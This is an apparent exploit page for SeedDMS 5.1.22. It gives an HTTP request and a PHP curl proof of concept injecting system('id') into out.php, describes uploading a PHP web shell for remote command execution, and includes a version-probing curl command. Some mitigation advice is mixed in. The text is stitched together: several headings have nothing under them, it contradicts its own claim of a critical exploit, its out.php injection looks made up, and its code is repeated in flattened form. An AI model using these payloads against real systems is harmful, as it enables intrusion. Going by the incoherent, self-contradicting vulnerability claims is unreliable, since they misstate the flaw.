Seeddms 5.1.22 | Exploit

After compromising admin credentials (via SQLi or brute force), the attacker can achieve RCE.

This exploit assumes:

SeedDMS 5.1.22 Vulnerability Analysis and Exploit

Introduction

SeedDMS is a popular open-source document management system used by organizations to manage and store documents. Version 5.1.22 of SeedDMS was found to have several vulnerabilities, including a critical exploit that allows an attacker to compromise the system. This paper aims to provide an analysis of the vulnerability and a detailed explanation of the exploit.

Vulnerability Analysis

The vulnerability in SeedDMS 5.1.22 is due to a lack of proper input validation and sanitization in the out.php file. Specifically, the $folder parameter is not validated, allowing an attacker to inject malicious input.

Exploit Details

The exploit is a PHP injection vulnerability that allows an attacker to execute arbitrary PHP code on the server. The exploit can be triggered by sending a malicious request to the out.php file with the following parameters:

Exploit Code

The following is an example of the exploit code:

POST /seeddms/out.php HTTP/1.1
Host: <target_host>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.3
folder=system('id');
id=1

Exploitation Steps

Proof of Concept

The following is a proof of concept code that demonstrates the exploit:

<?php
$url = 'http://<target_host>/seeddms/out.php';
$data = array(
    'folder' => 'system(\'id\')',
    'id' => '1'
);
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
echo $response;

Mitigation and Recommendations

To mitigate this vulnerability, it is recommended to:

Conclusion

The SeedDMS 5.1.22 exploit is a critical vulnerability that allows an attacker to compromise the system. This paper provides a detailed analysis of the vulnerability and the exploit, as well as recommendations for mitigation and prevention. It is essential for organizations using SeedDMS to take immediate action to protect their systems from potential attacks.

While there is no single widely-publicized critical exploit uniquely tied to SeedDMS 5.1.22, this specific version is often cited in security research contexts regarding historical vulnerabilities that affected the 5.1.x branch.

The most significant security concern for users on this version is CVE-2019-12744, an authenticated Remote Command Execution (RCE) vulnerability. Although patches were introduced in versions 5.1.11 and later, many security scanners and researchers test for variants of this flaw in subsequent releases like 5.1.22. Key Vulnerability: Authenticated RCE (CVE-2019-12744)

This exploit allows a user with "write" permissions to execute arbitrary system commands on the server. Attack Vector: Unvalidated File Upload.

Prerequisites: Valid user credentials and permission to add or update documents. Mechanism: An attacker logs into the SeedDMS interface.

They upload a malicious PHP script (e.g., a simple web shell) disguised as a document.

Because the application fails to properly validate the file extension or content, the PHP script is stored in the data directory.

The attacker then accesses the uploaded file's direct URL to execute system-level commands, such as cat /etc/passwd. Version Context (5.1.22)

Data from CVE Details indicates that while the major RCE was addressed earlier, version 5.1.22 has been analyzed for other minor issues including:

Stored Cross-Site Scripting (XSS): Potential for malicious scripts to be injected into document metadata or descriptions.

Path Traversal: Possible risks involving improper handling of file paths during document retrieval or export. Mitigation and Recommendations

If you are currently running SeedDMS 5.1.22, it is considered outdated. The developer, Uwe Steinmann, has since released more secure versions in the 6.0.x branch.

Upgrade: Update to the latest stable version of SeedDMS (currently in the 6.0.x series) to benefit from the most recent security patches and feature updates.

Restrict Permissions: Ensure that only trusted users have "Add Document" or "Edit" permissions to minimize the risk of authenticated file upload attacks.

Server-Side Security: Configure your web server (e.g., Apache or Nginx) to prevent the execution of PHP scripts within the document storage (data) directory. SeedDMS versions < 5.1.11 - Remote Command Execution

First, confirm the version without authentication:

curl -s http://192.168.1.100/seeddms51/out/out.Version.php | grep "Version"

Expected output includes 5.1.22.

POST /seeddms/out.php HTTP/1.1 Host: <target_host> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.3 folder=system('id'); id=1

<?php $url = 'http://<target_host>/seeddms/out.php'; $data = array( 'folder' => 'system(\'id\')', 'id' => '1' ); $ch = curl_init($url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data)); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $response = curl_exec($ch); curl_close($ch); echo $response;